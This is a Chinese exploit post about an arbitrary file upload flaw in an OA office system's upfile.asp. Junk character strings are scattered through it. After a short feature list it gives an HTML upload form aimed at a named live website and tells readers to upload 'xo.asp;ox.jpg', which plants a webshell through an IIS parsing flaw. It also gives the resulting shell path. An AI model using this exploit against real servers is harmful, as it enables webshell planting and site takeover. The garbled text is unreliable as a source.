全能OA办公系统 上传漏洞1 O \/ F; F( j8 h1 C
. `/ t5 x. Y% F- C3 v& Q8 _
系统介绍:& V4 f, Q- t: K& B$ l
* l2 A2 n4 R' A/ N, z0 V% e8 x1 O2 b全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 b2 ^* t. Y$ I# Z" v) }
& h2 |* d6 B' I2 q, W
主要功能:
* X3 E8 r/ `; l' W! c公司通告 ! d) W3 r W# Q+ [: ?
工作计划 / q u$ X Q9 m
通讯助理
# a0 M) z* }# s6 P8 f) i9 X2 w客户资源 ) g5 ^! q, n9 g. P9 O
我的公文
0 n/ k2 E6 L$ v. m公文传阅
9 x* F. D" y' U6 N! U公共资源 8 F2 w! V* I7 m& s6 O( `1 w
资源预约
0 k s! M1 ?3 O今日考勤 4 G/ A0 I; N7 M$ M4 c" b
个人计划
/ u$ {- w) z" o5 B个人通讯录 # T5 [" p# k3 v8 s( u5 c! V, }& T6 N# w
个人基本档案
8 A Q, S& ^' D' X7 U0 ]: X) h未读邮件
/ _+ P8 u3 ?& z) O9 u |% O发邮件 0 \9 {; I, _! W6 n/ p V( y( F
收件夹 V3 |# O5 m8 y5 r) Y
寄件夹
( X6 w( |4 c$ n; O) ^$ Z网络硬盘
- e" a" _8 `: k* e! a0 Z# K, w* N: y网络会议
0 U6 ?# C% L8 @; W8 W( U3 W- u网络调查 # P$ m1 [ Q, j
交流论坛
: Q4 e' i- @8 [* @; U1 R/ Z# ?
- `0 T. q; X6 i+ ?% }9 d! @$ O有兴趣测试的朋友可以下源码看看
3 W8 h" X7 n- ^; F1 z' \" E; n' d, \) ]- ^1 ^6 F( f
源码下载:3 b P& W% |: s8 Z+ U3 P
! L2 J# w6 o5 W, t& E6 i# F, whttp://www.mycodes.net/30/4750.htm
( h- r) F' `+ o& i3 w+ V0 G w
6 N" {: ~( [) y+ M漏洞介绍:) V0 I7 G0 w4 C! j. u
; N+ v- V# R- f& \9 w$ ~由upfile.asp上传文件漏洞引起
2 ^+ |! o: D9 y9 E% w6 f0 o! Q( O! F
% T( j1 E) l- Y* x; d2 E测试方法: D2 d- q$ K/ [* Z$ ^
( _1 `' R* k# |% x# {/ m
使用名小子上传http://www.itlynn.com/upfile.asp即可6 F) D6 \+ E' {8 G
4 H- n. U% t. i9 K9 n! X如果upfile.asp文件被删除不存在。+ f8 ~$ u1 \9 K6 |% b
3 J! `/ z+ ?- o- ?
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。1 e1 E# j# v; q" s# }
' @" I& o9 y# H. j" ^5 z l
如果存在那么将如下代码保存为upfile.html。0 t, Q' s& a1 H+ G
. g6 F/ v: r, V! y; ^然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
* s/ ?8 O2 }, c$ E7 B9 y2 s5 `! b6 j
) `% D- w+ j; U8 F
' ^" H' M% j; j01 <table border='0' align="center" cellpadding="5"> ' X( ^/ h; \( o9 A6 q; `6 r
) U8 C0 _( V# q4 P& G0 f1 R7 N- j
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
4 c, U$ Z# Y1 Q4 S; n( q$ O* z! Y* a+ R: P5 H' X& S, V
03 <tr>
! j2 q3 Q+ c" ~, R0 }! r1 R/ y; O8 a- Y3 g3 E* ?* d
04 <td>报错:</td>
: }2 a h3 B6 V; W% L. Q. e/ I
3 U b. \; Q$ I# K05 <td><input type='radio' name='errnumber' value='0'>
% G8 C/ |1 T2 i8 M9 l8 E: w
. B2 t4 E+ ^) A) O2 T1 B! Q06 自动更名 & w: M: ?3 _+ `* z
: [' i: Y6 |& m* R
07 <input type='radio' name='errnumber' value='1' checked>
* e( _: ~& _3 T' n+ B, H( `7 ?/ X7 _. X1 c Z2 `3 P, C: n
08 报错方式
( z+ q9 Y# N7 D$ c) E; i; U' H9 c
7 d3 I) e7 _ ?/ l. n09 <input type='radio' name='errnumber' value='2'> 8 G' {2 Q# ?/ c% g
( @$ v3 ^! B1 ?* r( a
10 直接覆盖</td>
; v# X3 W; ]; J' y: `; K. @; Y+ @9 W7 b
11 </tr> 5 h$ |, v2 H; y
P( K, b: [; n2 A. i+ g/ J12 <tr> ' x7 i0 V- P6 n# ?& @7 Z
! m; |+ N2 c: @$ u- I5 z1 `13 <td>主题:</td> 7 c8 p8 g2 J# k! G( g3 L
6 k! R# _! O V8 t1 r% g- N$ N
14 <td><input type='text' name='filename' size='30'></td> 0 g* D T; g' U9 K% ]! n4 ~
6 C& n# ]/ g7 F1 a
15 </tr> - U; i+ b. F0 A7 F
3 g/ B' S1 o) s8 \7 [6 o% g16 <tr> ' K+ g# k* D9 A) X9 _- r
+ r9 c5 t# @: q, Y& ~* @
17 <td>文件:</td> 1 q% B7 J9 ?0 ?; N0 w# G; _
! \0 f. |7 O* N" ]( s. I
18 <td><input type="file"name="fruit"size="30"></td>
1 g# t9 F4 N' n0 W- @. x& y; H d$ Q4 q/ U0 G6 G& |
19 </tr> 8 W! D5 A. B8 h
: o& h( m. _/ H6 J, {% ^" w* e, e
20 <tr> ( k4 e* v7 S' C: f' x
' T4 M* m8 @5 O. o
21 <td valign='top'>简介:</td> ; R1 ]7 o' W0 u' O
) b5 C" p* r1 n: G5 E+ d8 M. M+ V
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
1 ^% g2 ~' U! S% d. C4 k: U+ h7 r% f2 b, N& [
23 </tr>
2 L5 O U* h6 m" ]* i0 I' _, K- v/ t7 D# w( u4 z" s% d
24
6 W, ?2 ^; s+ c
+ F! b$ o: |: b25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
8 o3 k5 ?4 a0 X; E/ h5 ^- S* ]
( \/ i! u- [, W# Q& h26 </tr>
+ M6 \6 x" y, t+ S
- {2 Y8 C2 i# i0 r F% P8 Y: [27 </form>
z( x2 f, q) }
8 q8 h" u! V1 h, f3 Y/ O1 l4 M6 D然后打开上传一个文件名为xo.asp;ox.jpg的文件。$ N2 G& }& ]* i) ]. p9 z
8 l7 b, v9 S& [# a( |6 f H; L; j # c% Z9 z7 `' `- u/ i
0 X& h5 Q* i, {; `- |+ k
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
0 T: C9 B" H/ Q/ `( M+ h W U# O2 @2 n* q; Y$ j. Y5 |6 J
此漏洞需要配合解析漏洞利用。
( X" S- Z$ N2 b3 ~5 p5 l2 P' z- ]) ~3 P8 j. |3 o. h
|